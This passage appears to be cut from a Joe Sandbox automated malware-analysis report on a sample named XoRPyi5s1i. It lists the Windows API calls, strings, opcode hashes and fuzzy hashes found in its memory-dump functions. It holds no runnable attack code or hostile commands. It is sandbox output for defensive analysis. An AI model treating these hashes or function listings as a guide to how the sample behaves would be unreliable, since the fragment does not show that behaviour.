                                    • Instruction Fuzzy Hash: 88319C31100215BBDF259FA4EC49FEA3B69FF1A760F110324FA19A60A0D732D851DBA5
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 2620052-3771769585
                                    • Opcode ID: 3c4adbf1d837359cfee38d7c0f90a970886b093d7a0518a0ecc7f9b95bf5203a
                                    • Instruction ID: 2caad446cc12a01037fd2626484638d5be1718e79500dd46a4b93bc32c67a134
                                    • Opcode Fuzzy Hash: 3c4adbf1d837359cfee38d7c0f90a970886b093d7a0518a0ecc7f9b95bf5203a
                                    • Instruction Fuzzy Hash: B1113632904105ABCB28ABB0AC0AEEA77BCEF14711F0041A9F419A6091FF70DEC58B50
                                    APIs
                                    • _memset.LIBCMT ref: 00155047
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • __gmtime64_s.LIBCMT ref: 001550E0
                                    • __gmtime64_s.LIBCMT ref: 00155116
                                    • __gmtime64_s.LIBCMT ref: 00155133
                                    • __allrem.LIBCMT ref: 00155189
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001551A5
                                    • __allrem.LIBCMT ref: 001551BC
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001551DA
                                    • __allrem.LIBCMT ref: 001551F1
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0015520F
                                    • __invoke_watson.LIBCMT ref: 00155280
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                    • String ID:
                                    • API String ID: 384356119-0
                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                    • Instruction ID: 4cce7bb5368e3ac8857b8257498679e71e4b23f78655fefd130990cb4f1f77e3
                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                    • Instruction Fuzzy Hash: A371F872A00F16EBD7149E78CCA2B6A77AAAF14365F154229FC20DF6C2E770D94487D0
                                    APIs
                                    • _memset.LIBCMT ref: 00174DF8
                                    • GetMenuItemInfoW.USER32(001F1708,000000FF,00000000,00000030), ref: 00174E59
                                    • SetMenuItemInfoW.USER32(001F1708,00000004,00000000,00000030), ref: 00174E8F
                                    • Sleep.KERNEL32(000001F4), ref: 00174EA1
                                    • GetMenuItemCount.USER32(?), ref: 00174EE5
                                    • GetMenuItemID.USER32(?,00000000), ref: 00174F01
                                    • GetMenuItemID.USER32(?,-00000001), ref: 00174F2B
                                    • GetMenuItemID.USER32(?,?), ref: 00174F70
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00174FB6
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00174FCA
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00174FEB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                    • String ID:
                                    • API String ID: 4176008265-0
                                    • Opcode ID: 8b24b29b7ed72e7bd0ae483c372f5cf40ff8b47070a9d51d0188979d0ac40e8b
                                    • Instruction ID: e1ddd38230bbb8626f869b0dde65c957e2c8b0e22b5dfd7e393803cf36755ca3
                                    • Opcode Fuzzy Hash: 8b24b29b7ed72e7bd0ae483c372f5cf40ff8b47070a9d51d0188979d0ac40e8b
                                    • Instruction Fuzzy Hash: 8861CF70900249AFDB25CFA8DC88ABE7BB9FB05308F148159F849E3250E731AD44CB60
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00199C98
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00199C9B
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00199CBF
                                    • _memset.LIBCMT ref: 00199CD0
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00199CE2
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00199D5A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow_memset
                                    • String ID:
                                    • API String ID: 830647256-0
                                    • Opcode ID: 49f9c78242b8f7f0c4911c2448aa403882066fa7d3bb5bad0f9f1719e1327d05
                                    • Instruction ID: e119929cdd5c66234a30c98d14ac50bcd312d883c5e25585a613c73426368062
                                    • Opcode Fuzzy Hash: 49f9c78242b8f7f0c4911c2448aa403882066fa7d3bb5bad0f9f1719e1327d05
                                    • Instruction Fuzzy Hash: D9616975900208EFDB11DFA8CC81EEEB7B8EF09714F14415AFA15E7291D7B0AA46DB50
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 001694FE
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00169549
                                    • VariantInit.OLEAUT32(?), ref: 0016955B
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0016957B
                                    • VariantCopy.OLEAUT32(?,?), ref: 001695BE
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 001695D2
                                    • VariantClear.OLEAUT32(?), ref: 001695E7
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 001695F4
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001695FD
                                    • VariantClear.OLEAUT32(?), ref: 0016960F
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0016961A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 0bd6b6de935393821d5c3c5d2e7adb546034cf821401a448be0a9c8ec4385673
                                    • Instruction ID: f5357a6b471ff64cdd2837a91448651bb59c6602591da0e11246eb40ec251324
                                    • Opcode Fuzzy Hash: 0bd6b6de935393821d5c3c5d2e7adb546034cf821401a448be0a9c8ec4385673
                                    • Instruction Fuzzy Hash: 0B413D75A00219EFCB05EFA4DC849DEBF79FF48354F008165F502A3661EB31AA95CBA1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$_memset
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                    • API String ID: 2862541840-1765764032
                                    • Opcode ID: 9519464341b34a30aab48e7a3817f85d39910586182f1b87d3b60cdf6bda93ff
                                    • Instruction ID: a93e0441dfae39693838fe2d76470bd060147c66f92feec311d3bf0edd9c4c4a
                                    • Opcode Fuzzy Hash: 9519464341b34a30aab48e7a3817f85d39910586182f1b87d3b60cdf6bda93ff
                                    • Instruction Fuzzy Hash: 89919271A04215AFDF24EF95C884FAEBBB8EF45714F108559F515AB280DB709A44CFA0
                                    APIs
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • CoInitialize.OLE32 ref: 0018ADF6
                                    • CoUninitialize.COMBASE ref: 0018AE01
                                    • CoCreateInstance.COMBASE(?,00000000,00000017,001BD8FC,?), ref: 0018AE61
                                    • IIDFromString.COMBASE(?,?), ref: 0018AED4
                                    • VariantInit.OLEAUT32(?), ref: 0018AF6E
                                    • VariantClear.OLEAUT32(?), ref: 0018AFCF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 834269672-1287834457
                                    • Opcode ID: 98915bbbe04ab34921d4b4e324540a5b4bbce214f462627a9f932479cf086a85
                                    • Instruction ID: ac22a86ab1263026fadf4fc80d294ce830f5f34a115a09737af76ca002c717d7
                                    • Opcode Fuzzy Hash: 98915bbbe04ab34921d4b4e324540a5b4bbce214f462627a9f932479cf086a85
                                    • Instruction Fuzzy Hash: 206190702087019FE714EF64D884B6EB7E8AF48714F50491AFA859B291D770EE44CF93
                                    APIs
                                    • WSAStartup.WS2_32(00000101,?), ref: 00188168
                                    • inet_addr.WS2_32(?), ref: 001881AD
                                    • gethostbyname.WS2_32(?), ref: 001881B9
                                    • IcmpCreateFile.IPHLPAPI ref: 001881C7
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00188237
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0018824D
                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001882C2
                                    • WSACleanup.WS2_32 ref: 001882C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 0ef4a09757f249a4cbec7be456c56d122a67e46ba892502a1aac4790e50fe2c6
                                    • Instruction ID: 031bacb6697a1dde05b3a695278a3dc165d87cd187609ca2cc8d64cd388faa22
                                    • Opcode Fuzzy Hash: 0ef4a09757f249a4cbec7be456c56d122a67e46ba892502a1aac4790e50fe2c6
                                    • Instruction Fuzzy Hash: EA51BF316047009FD724AF64DC89B2ABBE5BF58320F448929FA59DB2A0DF30EA41CF41
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0017E396
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0017E40C
                                    • GetLastError.KERNEL32 ref: 0017E416
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0017E483
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 2c1ae4ccaff906d24b5aed8cb62ff2081a8821f485127b5f51b29d04754b408e
                                    • Instruction ID: c6b34074a12816d807250989cc20d8ef8f8725b1f31827a19c7efd3d761884e7
                                    • Opcode Fuzzy Hash: 2c1ae4ccaff906d24b5aed8cb62ff2081a8821f485127b5f51b29d04754b408e
                                    • Instruction Fuzzy Hash: 5631A635A002059FDB05DF64D849AADB7F8FF58304F14C096F50AE7291D770DA41CB91
                                    APIs
                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0016B98C
                                    • GetDlgCtrlID.USER32 ref: 0016B997
                                    • GetParent.USER32 ref: 0016B9B3
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0016B9B6
                                    • GetDlgCtrlID.USER32(?), ref: 0016B9BF
                                    • GetParent.USER32(?), ref: 0016B9DB
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0016B9DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1383977212-1403004172
                                    • Opcode ID: 671bf91c1db5df5f782617ebfb34b5afbc16c1dc4c07fbe4454bb7b4dae8951a
                                    • Instruction ID: c1903a9bb7fb84b6c914f1ad974da41167cadb2da3976f093c6a643ad2231b09
                                    • Opcode Fuzzy Hash: 671bf91c1db5df5f782617ebfb34b5afbc16c1dc4c07fbe4454bb7b4dae8951a
                                    • Instruction Fuzzy Hash: FF21C8B4A00104BFDB08ABA4DC95EFEBB75EF55300F100115F951A32D1EB745865DF60
                                    APIs
                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0016BA73
                                    • GetDlgCtrlID.USER32 ref: 0016BA7E
                                    • GetParent.USER32 ref: 0016BA9A
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0016BA9D
                                    • GetDlgCtrlID.USER32(?), ref: 0016BAA6
                                    • GetParent.USER32(?), ref: 0016BAC2
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0016BAC5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1383977212-1403004172
                                    • Opcode ID: ae9d394ff807748df6b0ffa0c0d3bfb080563d278b6b2635bbb4bb0c19744909
                                    • Instruction ID: 49833b3fbfecb13b9de37342d0fb4e65d3258d9b953a40898b4d9bbb89b8e86f
                                    • Opcode Fuzzy Hash: ae9d394ff807748df6b0ffa0c0d3bfb080563d278b6b2635bbb4bb0c19744909
                                    • Instruction Fuzzy Hash: 2021C2B4A00108BFDB04ABA4DC85EFEBB79EF55300F100119F951A3191EB7559699F60
                                    APIs
                                    • GetParent.USER32 ref: 0016BAE3
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 0016BAF8
                                    • _wcscmp.LIBCMT ref: 0016BB0A
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0016BB85
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend_wcscmp
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1704125052-3381328864
                                    • Opcode ID: fdca317828dbedd493f38757f1489751d012f8740fe87d50c99286b5e45513c8
                                    • Instruction ID: 651cdac3726b99d28acb4e20f72b58cab2c80a824c16729ba6bbb3c08502fcd4
                                    • Opcode Fuzzy Hash: fdca317828dbedd493f38757f1489751d012f8740fe87d50c99286b5e45513c8
                                    • Instruction Fuzzy Hash: D011593660C343FEFA296631EC17DAA379D8B65320B200032FD14E54D5FFB168E04514
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 0018B2D5
                                    • CoInitialize.OLE32(00000000), ref: 0018B302
                                    • CoUninitialize.COMBASE ref: 0018B30C
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0018B40C
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0018B539
                                    • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0018B56D
                                    • CoGetObject.OLE32(?,00000000,001BD91C,?), ref: 0018B590
                                    • SetErrorMode.KERNEL32(00000000), ref: 0018B5A3
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0018B623
                                    • VariantClear.OLEAUT32(001BD91C), ref: 0018B633
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                    • String ID:
                                    • API String ID: 2395222682-0
                                    • Opcode ID: 325335ddc4a29709bab32559219fc9ec6667cb5938385c8337679f1d0bb99670
                                    • Instruction ID: 1808f4c8e09bec24f21cf6e2113f9a0728754ebe522d3765417a1aaec46cf2d6
                                    • Opcode Fuzzy Hash: 325335ddc4a29709bab32559219fc9ec6667cb5938385c8337679f1d0bb99670
                                    • Instruction Fuzzy Hash: 1DC10271608305AFC704EF68D88596BB7E9BF89308F00495DF98A9B251DB71EE05CF92
                                    APIs
                                    • __lock.LIBCMT ref: 0015ACC1
                                      • Part of subcall function 00157CF4: __mtinitlocknum.LIBCMT ref: 00157D06
                                      • Part of subcall function 00157CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00157D1F
                                    • __calloc_crt.LIBCMT ref: 0015ACD2
                                      • Part of subcall function 00156986: __calloc_impl.LIBCMT ref: 00156995
                                      • Part of subcall function 00156986: Sleep.KERNEL32(00000000,000003BC,0014F507,?,0000000E), ref: 001569AC
                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0015ACED
                                    • GetStartupInfoW.KERNEL32(?,001E6E28,00000064,00155E91,001E6C70,00000014), ref: 0015AD46
                                    • __calloc_crt.LIBCMT ref: 0015AD91
                                    • GetFileType.KERNEL32(00000001), ref: 0015ADD8
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0015AE11
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1426640281-0
                                    • Opcode ID: 4d46f61cf222d396080309530af9bd154fa16871d1944639c1fbf87f62c11e7f
                                    • Instruction ID: 75f33a8ca0dc7d5aa6acf2adf94498655ce276486214a6d5127f8ccbbc298921
